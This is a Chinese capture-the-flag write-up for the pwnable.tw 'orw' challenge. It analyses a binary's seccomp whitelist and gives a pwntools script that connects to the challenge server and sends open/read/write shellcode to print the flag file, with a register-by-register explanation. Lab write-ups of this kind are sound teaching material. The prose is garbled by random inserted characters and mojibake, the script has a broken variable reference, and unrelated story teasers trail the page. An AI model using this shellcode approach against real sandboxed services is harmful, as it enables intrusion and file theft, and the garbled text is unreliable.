【pwnable.tw 系列】orw

概述:本題是pwn的入門級題目,主要是讓初學(xué)者學(xué)會(huì)編寫shellcode豌鹤。

1亡哄、首先file start,可以看到這是一個(gè)32位的elf文件傍药,動(dòng)態(tài)鏈接磺平,同時(shí)保留了符號信息;

file orw

2拐辽、然后checksec orw拣挪,可以看到只開啟了Canary;

checksec orw

3俱诸、然后用IDA打開目標(biāo)文件開始分析菠劝,用F5查看可知主函數(shù)邏輯比較簡單清晰,先調(diào)用了一個(gè)orw_seccomp()函數(shù)睁搭,然后會(huì)將我們輸入的字符串直接執(zhí)行赶诊,所以本題不需要再找其他的漏洞笼平,但是嘗試發(fā)送開shell的shellcode會(huì)發(fā)現(xiàn)失敗,似乎會(huì)返回一個(gè)shell舔痪,但不返回命令的結(jié)果寓调,然后開始研究orw_seccomp()函數(shù)。


main函數(shù)
傳開shell的shellcode

【引用】seccomp 是 secure computing 的縮寫锄码,其是 Linux kernel 從2.6.23版本引入的一種簡潔的 sandboxing 機(jī)制夺英。在 Linux 系統(tǒng)里,大量的系統(tǒng)調(diào)用(system call)直接暴露給用戶態(tài)程序滋捶。但是痛悯,并不是所有的系統(tǒng)調(diào)用都被需要,而且不安全的代碼濫用系統(tǒng)調(diào)用會(huì)對系統(tǒng)造成安全威脅重窟。seccomp安全機(jī)制能使一個(gè)進(jìn)程進(jìn)入到一種“安全”運(yùn)行模式载萌,該模式下的進(jìn)程只能調(diào)用4種系統(tǒng)調(diào)用(system call),即 read(), write(), exit() 和 sigreturn()巡扇,否則進(jìn)程便會(huì)被終止扭仁。

【引用】seccomp 簡單來說就是一個(gè)白名單,每個(gè)進(jìn)程進(jìn)行系統(tǒng)調(diào)用(system call)時(shí)霎迫,kernal 都會(huì)檢查對應(yīng)的白名單以確認(rèn)該進(jìn)程是否有權(quán)限使用這個(gè)系統(tǒng)調(diào)用斋枢。這個(gè)白名單是用 berkeley package filter(BPF)格式書寫的。

由上面的引用內(nèi)容可知知给,應(yīng)該是存在一個(gè)白名單內(nèi)記錄著進(jìn)程允許的系統(tǒng)調(diào)用,而開shell的系統(tǒng)調(diào)用明顯不在其中描姚,然后開始分析seccomp函數(shù)涩赢,看到其中調(diào)用了memcpy()將0x8048460開始的0x60大小的內(nèi)容拷貝到棧上,懷疑這個(gè)就是白名單轩勘,利用ida腳本將其dump出來筒扒,苦逼的是不知道怎么解讀這段數(shù)據(jù),百度也沒有找到相關(guān)內(nèi)容绊寻,如果有哪個(gè)大佬知道請指教花墩。


seccomp函數(shù)
orw.dump

分析到這里只能選擇嘗試的辦法來進(jìn)行分析了,雖然不能開shell但終極目的并不是開shell而是獲得flag澄步,所以我們可以試一下read冰蘑、write等的shellcode能否被執(zhí)行,基于此思路并參考Linux Syscall Reference(http://syscalls.kernelgrok.com/)寫出如下exp:

# -*- coding:utf-8 -*-

"""

exp for pwnable.tw orw.

by rafa.

"""

from pwn import? *

def exp():

? ? p = remote('chall.pwnable.tw',10001)

? ? p.recvuntil(':')

# 先 open 文件村缸,然后 read 讀出內(nèi)容祠肥,再 write 打印到終端

? ? shellcode = "xor? ecx,ecx;push ecx;push 0x67616c66;push 0x2f77726f;push 0x2f656d6f;push 0x682f2f2f;mov? ebx,esp;xor? edx,edx;mov? eax,0x5;int? 0x80;mov ebx,eax;mov ecx,esp;mov edx,0x30;mov eax,0x3;int 0x80;mov eax,0x4;mov ebx,0x1;mov edx,0x30;int 0x80"

? ? p.send(asm(shellcode))

? ? print io.recv()

? ? p.interactive()

if __name__ == '__main__':

exp()


其中shellcode部分解釋如下:

sys_open 系統(tǒng)調(diào)用傳遞的四個(gè)寄存器參數(shù)即具體實(shí)現(xiàn):

eax = 0x05 系統(tǒng)調(diào)用號

ebx = filename 文件名

ecx = flags 置零即可

edx = mode 置零即可

具體實(shí)現(xiàn):

??? xor? ecx,ecx;

??? push ecx;

??? push 0x67616c66;

??? push 0x2f77726f;

??? push 0x2f656d6f;

??? push 0x682f2f2f;

??? mov? ebx,esp;

??? xor? edx,edx;

??? mov? eax,0x5;

??? int? 0x80

sys_read 系統(tǒng)調(diào)用傳遞的四個(gè)寄存器參數(shù)即具體實(shí)現(xiàn):

eax = 0x03? 系統(tǒng)調(diào)用號

ebx = fd 文件指針,就是open的返回值梯皿,不需要改變

ecx = buf 緩沖區(qū)仇箱,指向棧頂位置

edx = count? 字節(jié)數(shù)

具體實(shí)現(xiàn):

??? mov ebx,eax;

??? mov ecx,esp;

??? mov edx,0x30;

??? mov eax,0x3;

??? int 0x80

sys_write 系統(tǒng)調(diào)用傳遞的四個(gè)寄存器參數(shù)即具體實(shí)現(xiàn):

eax = 0x04? 系統(tǒng)調(diào)用號

ebx = fd? 文件指針县恕,置為1,打印到屏幕

ecx = buf? 緩沖區(qū)剂桥,指向棧頂

edx = count

具體實(shí)現(xiàn):

??? mov eax,0x4;

??? mov ebx,0x1;

??? mov edx,0x30;

??? int 0x80



運(yùn)行獲得flag:

flag
最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末忠烛,一起剝皮案震驚了整個(gè)濱河市,隨后出現(xiàn)的幾起案子权逗,更是在濱河造成了極大的恐慌况木,老刑警劉巖,帶你破解...
    沈念sama閱讀 219,490評論 6 508
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件旬迹,死亡現(xiàn)場離奇詭異火惊,居然都是意外死亡,警方通過查閱死者的電腦和手機(jī)奔垦,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 93,581評論 3 395
  • 文/潘曉璐 我一進(jìn)店門屹耐,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人椿猎,你說我怎么就攤上這事惶岭。” “怎么了犯眠?”我有些...
    開封第一講書人閱讀 165,830評論 0 356
  • 文/不壞的土叔 我叫張陵按灶,是天一觀的道長。 經(jīng)常有香客問我筐咧,道長鸯旁,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 58,957評論 1 295
  • 正文 為了忘掉前任量蕊,我火速辦了婚禮铺罢,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘残炮。我一直安慰自己韭赘,他們只是感情好,可當(dāng)我...
    茶點(diǎn)故事閱讀 67,974評論 6 393
  • 文/花漫 我一把揭開白布势就。 她就那樣靜靜地躺著泉瞻,像睡著了一般。 火紅的嫁衣襯著肌膚如雪苞冯。 梳的紋絲不亂的頭發(fā)上袖牙,一...
    開封第一講書人閱讀 51,754評論 1 307
  • 那天,我揣著相機(jī)與錄音抱完,去河邊找鬼贼陶。 笑死,一個(gè)胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的碉怔。 我是一名探鬼主播烘贴,決...
    沈念sama閱讀 40,464評論 3 420
  • 文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼撮胧!你這毒婦竟也來了桨踪?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 39,357評論 0 276
  • 序言:老撾萬榮一對情侶失蹤芹啥,失蹤者是張志新(化名)和其女友劉穎锻离,沒想到半個(gè)月后,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體墓怀,經(jīng)...
    沈念sama閱讀 45,847評論 1 317
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡汽纠,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 37,995評論 3 338
  • 正文 我和宋清朗相戀三年,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了傀履。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片虱朵。...
    茶點(diǎn)故事閱讀 40,137評論 1 351
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡,死狀恐怖钓账,靈堂內(nèi)的尸體忽然破棺而出碴犬,到底是詐尸還是另有隱情,我是刑警寧澤梆暮,帶...
    沈念sama閱讀 35,819評論 5 346
  • 正文 年R本政府宣布服协,位于F島的核電站,受9級特大地震影響啦粹,放射性物質(zhì)發(fā)生泄漏偿荷。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,482評論 3 331
  • 文/蒙蒙 一卖陵、第九天 我趴在偏房一處隱蔽的房頂上張望遭顶。 院中可真熱鬧,春花似錦泪蔫、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 32,023評論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至饶深,卻和暖如春餐曹,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背敌厘。 一陣腳步聲響...
    開封第一講書人閱讀 33,149評論 1 272
  • 我被黑心中介騙來泰國打工台猴, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留,地道東北人。 一個(gè)月前我還...
    沈念sama閱讀 48,409評論 3 373
  • 正文 我出身青樓饱狂,卻偏偏與公主長得像曹步,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個(gè)殘疾皇子休讳,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 45,086評論 2 355